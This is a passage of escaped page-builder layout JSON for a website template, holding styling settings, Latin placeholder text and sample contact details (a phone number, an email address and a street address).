isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"vjyahgi\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"txbpcpg\",\"elType\":\"widget\",\"settings\":{\"section_editor\":\"\",\"editor\":\"<p>At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga. Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit quo minus id quod maxime placeat facere possimus, omnis voluptas assumenda est, omnis dolor repellendus.<\\/p><p>Temporibus autem quibusdam et aut officiis debitis aut rerum necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestiae non recusandae. Itaque earum rerum hic tenetur a sapiente delectus, ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat.<\\/p>\",\"section_style\":\"\",\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"text_color\":\"\",\"typography_typography\":\"\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_family\":\"\",\"typography_font_weight\":\"\",\"typography_text_transform\":\"\",\"typography_font_style\":\"\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"htzwxas\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"iwkycdp\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"23.000\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"agvtkiu\",\"elType\":\"widget\",\"settings\":{\"section_editor\":\"\",\"editor\":\"<p><strong>Telephone :<\\/strong><\\/p><p>+0028 55 67 67<\\/p>\",\"section_style\":\"\",\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"text_color\":\"\",\"typography_typography\":\"\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_family\":\"\",\"typography_font_weight\":\"\",\"typography_text_transform\":\"\",\"typography_font_style\":\"\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"ohzerme\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"35.000\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"psnfmcz\",\"elType\":\"widget\",\"settings\":{\"section_editor\":\"\",\"editor\":\"<p><strong>Email<\\/strong><strong>:<\\/strong><\\/p><p>jennier_aster@yourdomain.com<\\/p>\",\"section_style\":\"\",\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"text_color\":\"\",\"typography_typography\":\"\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_family\":\"\",\"typography_font_weight\":\"\",\"typography_text_transform\":\"\",\"typography_font_style\":\"\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cxjokib\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"42.000\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"occlqta\",\"elType\":\"widget\",\"settings\":{\"section_editor\":\"\",\"editor\":\"<p><strong>Address :<\\/strong><\\/p><p>590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States<\\/p>\",\"section_style\":\"\",\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"text_color\":\"\",\"typography_typography\":\"\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_family\":\"\",\"typography_font_weight\":\"\",\"typography_text_transform\":\"\",\"typography_font_style\":\"\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"lanjlob\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"\",\"layout\":\"boxed\",\"content_width\":{\"unit\":\"px\",\"size\":\"800\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mo